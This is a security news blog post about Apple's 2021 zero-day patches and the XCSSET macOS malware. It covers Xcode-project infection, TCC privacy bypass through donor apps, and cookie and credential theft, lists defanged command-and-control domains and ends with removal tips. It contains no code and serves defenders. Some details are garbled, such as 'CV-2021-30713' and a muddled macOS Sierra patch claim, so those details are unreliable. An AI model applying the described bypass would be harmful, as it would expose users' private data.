Apple Releases Patches to Counter New Zero-day XCSSET Malware Attacks on macOS Apple has recently released security updates for macOS, tcOS, watchOS, iOS, and Safari web browser to fix several vulnerabilities, including an actively exploited zero-day vulnerability in macOS. This critical bug in macOS could be manipulated to take screenshots of someone’s system and take images of their activities without the person knowing it.
The company recognized that the XCSSET malware attacks were used to access the macOS privacy protection. Apple said that it knows that the security problems may have been actively manipulated. However, it neither provided attack details nor the threat actors’ information who may have exploited zero-day attacks.
According to Bleeping Computer, there are three cases when the tech giant Apple has experienced vulnerability issues. Two of these zero-day attacks, CVE-2021-30663, and CVE-2021-30665 affected the WebKit of Apple TV 4K and TV HD devices. However, the third zero-day attack, CV-2021-30713, impacted the macOS Big Sur devices, and there is a permission problem found in the TCC framework.
In August 2020, Trend Micro revealed a new strain of XCSSET malware. It was developed and written in AppleScript, a scripting language developed by Apple. It provides control over the script-enabled Mac application.
One of the most significant features of the XCSSET malware attack is that it leveraged two zero-days exploits. One is protected by the system integrity protection to steal the safari browser cookies, while the other one is used to omit prompts to install the safari application’s browser version. XCSSET malware attack is capable of the following actions.
It abuses the existing Safari and other browsers to steal user data using exploits.
It uses vulnerability to read and discard the Safari cookies.
It uses the development version of Safari to inject JavaScript code into websites using a Universal Cross-site Scripting attack.
It uploads files from the infected machines to the hacker’s specified server.
It encrypts files and displays a ransom note if the server commands.
It takes screenshots of the target’s current screen.
The XCSSET malware attacks target the Mac developers by infecting Xcode projects to exploit two zero-day vulnerabilities for stealing sensitive information and launching ransomware attacks to targeted systems. XCSSET malware is now re-engineered and aimed at Apple’s latest M1 chips. Its new variant implements advanced features to steal data focused on cryptocurrency applications.
According to Trend Micro, the malware can steal information associated with the applications, including Evernote, Notes, Telegram, QQ, Skype, and WeChat applications. It can also launch Universal Cross-site Scripting attacks to inject malicious JavaScript code into the browser and change the user’s browser experience. XCSSET attack allows the malware to replace cryptocurrency addresses and steal the login credentials for online services. These include Apple ID, amoCRM, Paypal, Google, Yandex, and SIPMarket.
The Transparency, Consent, and Control (TCC) framework is a macOS subsystem that blocks the installed applications from accessing the user’s sensitive information without asking permissions explicitly through a pop-up message. An example of active TCC is storing files in the documents directory, recording keystrokes, and capturing screenshots. When an application tries to perform such actions, a prompt is shown to the user asking whether to grant or deny permissions.
In some cases, users are required to authorize permissions to the applications. Upon granting permissions, they are now free to act without asking the user until they manually disable it in the privacy settings. Attackers can exploit this vulnerability by using malicious applications to bypass user privacy preferences and access sensitive data. Jamf researchers found that macOS zero-day vulnerability was used by the XCSSET malware attack to avoid Apple’s TCC protections designed to protect the user’s privacy.
While Apple did not give details about the zero-day attacks, Jamf researchers found that the patched macOS zero-day, CV-2021-30713, was used by the threat actors to target the Bypass TCC protection developed to protect user privacy.
The zero-day flaw allowed attackers to exploit the devices by taking the form of the AppleScript module.
XCSSET malware is installed to use the permissions that have been granted to troganized applications and exfiltrate sensitive information.
They specifically use the malware checked for screen capturing permissions from applications, such as Discord, Zoom, WhatsApp, Upwork, TeamViewer, and Skype, injecting malware into the application’s folder.
The attacker can dispose of that donor app while creating a malicious application to execute on the target devices by using an installed application with a proper permission set.
The XCSSET malware has been found in the Xcode projects leading to a tight spot of malicious payloads. Xcode is an integrated development environment (IDE) to develop Apple-related applications and software. Unusual infection in the developer’s project included the discovery of zero-day vulnerabilities. These Xcode projects have been modified. For example, on building, these projects run a malicious code that eventually leads to the XCSSET malware attack being run on the affected machine.
The second vulnerability is due to how Safari WebKit operates. Generally, launching a kit requires the user to submit a password. But a bypass was discovered that could be used to perform malicious tasks through the un-sandboxed Safari browser, which appears to perform hijacking.
CVE-2021-30663: An integer overflow issue in WebKit, that could lead to achieving arbitrary code execution when processing a maliciously crafted web content.
CVE-2021-30665: A memory corruption issue in WebKit, which could be exploited to arbitrary code execution when processing maliciously crafted web content.
During research conducted by Jamf, they found multiple hashes that were unidentified by Virus Toral previously. Apple’s built-in malware detector, XProtect, already detected some of the hashes discovered by Jamf. However, additional hashes identified by the Jamf team as being the XCSSET malware found their way to Github that compromise the affected repositories. The affected executables have been noticed as having one of the five possible filenames in the Xcode project.Here is a list of command and control domains.
trendmicronano[.]com
adoberelations[.]com
findmymacs[.]com
statsmag[.]com
flixprice[.]com
adobestats[.]com
icloudserv[.]com
titiez[.]com
atecasec[.]com
statsmag[.]xyz
sidelink[.]xyz
monotel[.]xyz
mantrucks[.]xyz
nodeline[.]xyz
linebrand[.]xyz
It is advisable to use trustworthy and official download sources to get rid of XCSSET malware attacks. Here are some tips you can follow.
You can avoid the XCSSET malware attacks by updating the macOS. Malwarebytes doubts that Sierra 10.12.2 includes a patch to solve this issue because up-to-date systems are less vulnerable to these kinds of attacks.
Remove malicious extensions from the Safari browser. Open the menu bar and select “Preferences” from the Safari browser. Then select “Extensions” from the preferences windows and find recently installed suspicious extensions. Click on the “Uninstall” to get rid of all XCSSET extensions or adware from the browser.
Remove unwanted applications or your “Applications” folder. Look for suspicious applications and drag them to the trash. After removing unwanted apps that can cause malicious ads, scan your Mac for the remaining unwanted components.
Thanks for reading this post. Please visit our site to read more interesting things like this:
You may also like these articles:
Arun KL is a cybersecurity professional with 15+ years of experience in IT infrastructure, cloud security, vulnerability management, Penetration Testing, security operations, and incident response. He is adept at designing and implementing robust security solutions to safeguard systems and data. Arun holds multiple industry certifications including CCNA, CCNA Security, RHCE, CEH, and AWS Security.
“Knowledge Arsenal: Empowering Your Security Journey through Continuous Learning”
"Cybersecurity All-in-One For Dummies" offers a comprehensive guide to securing personal and business digital assets from cyber threats, with actionable insights from industry experts.
BurpGPT is a cutting-edge Burp Suite extension that harnesses the power of OpenAI's language models to revolutionize web application security testing. With customizable prompts and advanced AI capabilities, BurpGPT enables security professionals to uncover bespoke vulnerabilities, streamline assessments, and stay ahead of evolving threats.
PentestGPT, developed by Gelei Deng and team, revolutionizes penetration testing by harnessing AI power. Leveraging OpenAI's GPT-4, it automates and streamlines the process, making it efficient and accessible. With advanced features and interactive guidance, PentestGPT empowers testers to identify vulnerabilities effectively, representing a significant leap in cybersecurity.
Tenable BurpGPT is a powerful Burp Suite extension that leverages OpenAI's advanced language models to analyze HTTP traffic and identify potential security risks. By automating vulnerability detection and providing AI-generated insights, BurpGPT dramatically reduces manual testing efforts for security researchers, developers, and pentesters.
Microsoft Security Copilot is a revolutionary AI-powered security solution that empowers cybersecurity professionals to identify and address potential breaches effectively. By harnessing advanced technologies like OpenAI's GPT-4 and Microsoft's extensive threat intelligence, Security Copilot streamlines threat detection and response, enabling defenders to operate at machine speed and scale.